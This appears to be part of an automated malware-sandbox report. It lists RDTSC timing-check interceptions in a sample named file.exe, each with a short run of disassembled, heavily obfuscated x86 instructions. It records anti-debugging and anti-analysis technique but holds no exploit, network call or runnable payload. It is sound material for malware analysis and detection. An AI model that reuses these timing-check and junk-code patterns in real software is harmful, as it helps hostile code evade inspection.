                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D807F2 second address: 4D80859 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 50ABC50Eh 0x00000008 call 00007F43A4FCF69Fh 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 xchg eax, ebp 0x00000012 jmp 00007F43A4FCF69Fh 0x00000017 mov ebp, esp 0x00000019 jmp 00007F43A4FCF6A6h 0x0000001e xchg eax, ecx 0x0000001f jmp 00007F43A4FCF6A0h 0x00000024 push eax 0x00000025 jmp 00007F43A4FCF69Bh 0x0000002a xchg eax, ecx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80859 second address: 4D8085D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8085D second address: 4D80878 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4FCF6A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80878 second address: 4D80928 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 movsx edi, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [775165FCh] 0x00000010 jmp 00007F43A4BB4C2Ah 0x00000015 test eax, eax 0x00000017 jmp 00007F43A4BB4C30h 0x0000001c je 00007F44172C7CE8h 0x00000022 jmp 00007F43A4BB4C30h 0x00000027 mov ecx, eax 0x00000029 pushad 0x0000002a mov cx, E9DDh 0x0000002e mov edi, ecx 0x00000030 popad 0x00000031 xor eax, dword ptr [ebp+08h] 0x00000034 jmp 00007F43A4BB4C35h 0x00000039 and ecx, 1Fh 0x0000003c jmp 00007F43A4BB4C2Eh 0x00000041 ror eax, cl 0x00000043 pushad 0x00000044 push esi 0x00000045 mov cx, di 0x00000048 pop edi 0x00000049 jmp 00007F43A4BB4C36h 0x0000004e popad 0x0000004f leave 0x00000050 jmp 00007F43A4BB4C30h 0x00000055 retn 0004h 0x00000058 nop 0x00000059 mov esi, eax 0x0000005b lea eax, dword ptr [ebp-08h] 0x0000005e xor esi, dword ptr [006C2014h] 0x00000064 push eax 0x00000065 push eax 0x00000066 push eax 0x00000067 lea eax, dword ptr [ebp-10h] 0x0000006a push eax 0x0000006b call 00007F43A92B5556h 0x00000070 push FFFFFFFEh 0x00000072 push eax 0x00000073 push edx 0x00000074 push eax 0x00000075 push edx 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80928 second address: 4D8092C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8092C second address: 4D80930 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80930 second address: 4D80936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80936 second address: 4D80979 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4BB4C34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a jmp 00007F43A4BB4C30h 0x0000000f ret 0x00000010 nop 0x00000011 push eax 0x00000012 call 00007F43A92B558Fh 0x00000017 mov edi, edi 0x00000019 jmp 00007F43A4BB4C30h 0x0000001e xchg eax, ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80979 second address: 4D8097D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8097D second address: 4D80983 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D3004F second address: 4D3005B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D3005B second address: 4D3008F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F43A4BB4C39h 0x0000000a or al, FFFFFFC6h 0x0000000d jmp 00007F43A4BB4C31h 0x00000012 popfd 0x00000013 popad 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D3008F second address: 4D300B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F43A4FCF6A7h 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D300B4 second address: 4D300D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 mov edx, eax 0x00000008 pop ecx 0x00000009 popad 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F43A4BB4C2Dh 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D300D1 second address: 4D300D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D300D7 second address: 4D30131 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4BB4C2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c pushad 0x0000000d mov bx, cx 0x00000010 pushad 0x00000011 call 00007F43A4BB4C38h 0x00000016 pop esi 0x00000017 mov ecx, ebx 0x00000019 popad 0x0000001a popad 0x0000001b push esi 0x0000001c jmp 00007F43A4BB4C2Ah 0x00000021 mov dword ptr [esp], ecx 0x00000024 jmp 00007F43A4BB4C30h 0x00000029 xchg eax, ebx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D30131 second address: 4D30135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D30135 second address: 4D3013B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D3020E second address: 4D30274 instructions: 0x00000000 rdtsc 0x00000002 mov di, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebx, esi 0x00000009 popad 0x0000000a test esi, esi 0x0000000c jmp 00007F43A4FCF69Eh 0x00000011 je 00007F441772DA83h 0x00000017 jmp 00007F43A4FCF6A0h 0x0000001c cmp dword ptr [esi+08h], DDEEDDEEh 0x00000023 jmp 00007F43A4FCF6A0h 0x00000028 je 00007F441772DA6Ch 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F43A4FCF6A7h 0x00000035 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D30274 second address: 4D302A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4BB4C39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [esi+44h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F43A4BB4C2Dh 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D302A3 second address: 4D302A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D302A9 second address: 4D302AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D302AD second address: 4D30350 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 or edx, dword ptr [ebp+0Ch] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F43A4FCF6A5h 0x00000012 sbb si, 0876h 0x00000017 jmp 00007F43A4FCF6A1h 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007F43A4FCF6A0h 0x00000023 sub eax, 631AED98h 0x00000029 jmp 00007F43A4FCF69Bh 0x0000002e popfd 0x0000002f popad 0x00000030 test edx, 61000000h 0x00000036 pushad 0x00000037 pushfd 0x00000038 jmp 00007F43A4FCF6A4h 0x0000003d and ecx, 289D17F8h 0x00000043 jmp 00007F43A4FCF69Bh 0x00000048 popfd 0x00000049 mov eax, 5B1E392Fh 0x0000004e popad 0x0000004f jne 00007F441772D9E0h 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 mov edi, 7A23D272h 0x0000005d mov ax, dx 0x00000060 popad 0x00000061 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D208BA second address: 4D208F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4BB4C2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F43A4BB4C36h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F43A4BB4C2Dh 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D208F2 second address: 4D208F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D208F6 second address: 4D208FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D208FC second address: 4D2092F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F43A4FCF69Ah 0x00000009 adc cl, FFFFFF98h 0x0000000c jmp 00007F43A4FCF69Bh 0x00000011 popfd 0x00000012 mov ch, 0Dh 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F43A4FCF69Eh 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D2092F second address: 4D20973 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4BB4C2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov ecx, 5E59BF4Bh 0x00000011 jmp 00007F43A4BB4C30h 0x00000016 popad 0x00000017 and esp, FFFFFFF8h 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F43A4BB4C37h 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D20973 second address: 4D2098B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43A4FCF6A4h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D2098B second address: 4D209AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov eax, edx 0x0000000e jmp 00007F43A4BB4C35h 0x00000013 popad 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D209AF second address: 4D209D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4FCF6A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov al, dh 0x00000011 mov di, ax 0x00000014 popad 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D209D0 second address: 4D20A44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 mov dh, 17h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, esi 0x0000000b jmp 00007F43A4BB4C32h 0x00000010 push eax 0x00000011 jmp 00007F43A4BB4C2Bh 0x00000016 xchg eax, esi 0x00000017 pushad 0x00000018 mov dx, cx 0x0000001b push ecx 0x0000001c pushfd 0x0000001d jmp 00007F43A4BB4C37h 0x00000022 jmp 00007F43A4BB4C33h 0x00000027 popfd 0x00000028 pop ecx 0x00000029 popad 0x0000002a mov esi, dword ptr [ebp+08h] 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F43A4BB4C32h 0x00000034 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D20A44 second address: 4D20A86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4FCF69Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b pushad 0x0000000c mov bl, 50h 0x0000000e popad 0x0000000f test esi, esi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F43A4FCF6A4h 0x0000001a add cl, FFFFFF88h 0x0000001d jmp 00007F43A4FCF69Bh 0x00000022 popfd 0x00000023 mov bx, ax 0x00000026 popad 0x00000027 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D20A86 second address: 4D20AC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4BB4C35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F441731A515h 0x0000000f jmp 00007F43A4BB4C2Eh 0x00000014 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D20AC0 second address: 4D20AC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D20AC4 second address: 4D20AE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4BB4C39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D20AE1 second address: 4D20B4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ecx, esi 0x0000000c pushad 0x0000000d pushad 0x0000000e call 00007F43A4FCF69Bh 0x00000013 pop eax 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pushfd 0x00000018 jmp 00007F43A4FCF69Fh 0x0000001d and ch, FFFFFFEEh 0x00000020 jmp 00007F43A4FCF6A9h 0x00000025 popfd 0x00000026 popad 0x00000027 je 00007F4417734F0Dh 0x0000002d jmp 00007F43A4FCF69Eh 0x00000032 test byte ptr [77516968h], 00000002h 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D20B4C second address: 4D20B53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D20B53 second address: 4D20B91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, di 0x00000006 pushfd 0x00000007 jmp 00007F43A4FCF6A1h 0x0000000c adc cx, 5886h 0x00000011 jmp 00007F43A4FCF6A1h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a jne 00007F4417734EC7h 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D20B91 second address: 4D20B95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D20B95 second address: 4D20B99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D20B99 second address: 4D20B9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D20B9F second address: 4D20C37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F43A4FCF6A0h 0x00000009 xor ch, 00000058h 0x0000000c jmp 00007F43A4FCF69Bh 0x00000011 popfd 0x00000012 mov esi, 4310BF0Fh 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov edx, dword ptr [ebp+0Ch] 0x0000001d jmp 00007F43A4FCF6A2h 0x00000022 xchg eax, ebx 0x00000023 jmp 00007F43A4FCF6A0h 0x00000028 push eax 0x00000029 jmp 00007F43A4FCF69Bh 0x0000002e xchg eax, ebx 0x0000002f jmp 00007F43A4FCF6A6h 0x00000034 xchg eax, ebx 0x00000035 jmp 00007F43A4FCF6A0h 0x0000003a push eax 0x0000003b jmp 00007F43A4FCF69Bh 0x00000040 xchg eax, ebx 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 popad 0x00000047 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D20C37 second address: 4D20C3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D20C3B second address: 4D20C41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D20CAA second address: 4D20CD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 mov ax, bx 0x0000000a mov ebx, 0D0F3212h 0x0000000f popad 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F43A4BB4C34h 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D20CD1 second address: 4D20D0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4FCF69Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esp, ebp 0x0000000b jmp 00007F43A4FCF6A6h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007F43A4FCF69Dh 0x00000019 mov cx, 28F7h 0x0000001d popad 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D30C27 second address: 4D30C2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D30C2B second address: 4D30C2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D30C2F second address: 4D30C35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D30C35 second address: 4D30C62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4FCF69Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007F43A4FCF6A0h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D30C62 second address: 4D30C68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D30C68 second address: 4D30C77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43A4FCF69Bh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D309CD second address: 4D309D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D309D1 second address: 4D309D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D309D5 second address: 4D309DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D309DB second address: 4D30A39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, 7Ah 0x00000005 mov bx, 9618h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jmp 00007F43A4FCF69Ch 0x00000012 mov dword ptr [esp], ebp 0x00000015 pushad 0x00000016 push esi 0x00000017 jmp 00007F43A4FCF69Dh 0x0000001c pop esi 0x0000001d mov di, AC24h 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 jmp 00007F43A4FCF6A3h 0x00000029 pop ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F43A4FCF6A5h 0x00000031 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB06E1 second address: 4DB06E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB06E7 second address: 4DB06EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB06EB second address: 4DB06EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB06EF second address: 4DB071C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov eax, 671029BBh 0x0000000f mov edx, eax 0x00000011 popad 0x00000012 mov dword ptr [esp], ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F43A4FCF6A4h 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB071C second address: 4DB0720 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0720 second address: 4DB0726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0726 second address: 4DB0737 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43A4BB4C2Dh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0737 second address: 4DB073B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB073B second address: 4DB076C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F43A4BB4C2Dh 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007F43A4BB4C33h 0x00000018 mov edi, ecx 0x0000001a popad 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB076C second address: 4DB0780 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43A4FCF6A0h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0780 second address: 4DB0784 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0A13 second address: 4DA0A19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0A19 second address: 4DA0A28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0A28 second address: 4DA0A2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0A2C second address: 4DA0A41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4BB4C31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0A41 second address: 4DA0A75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 7CF2h 0x00000007 mov eax, edi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F43A4FCF69Eh 0x00000017 adc cx, 8008h 0x0000001c jmp 00007F43A4FCF69Bh 0x00000021 popfd 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 rdtsc
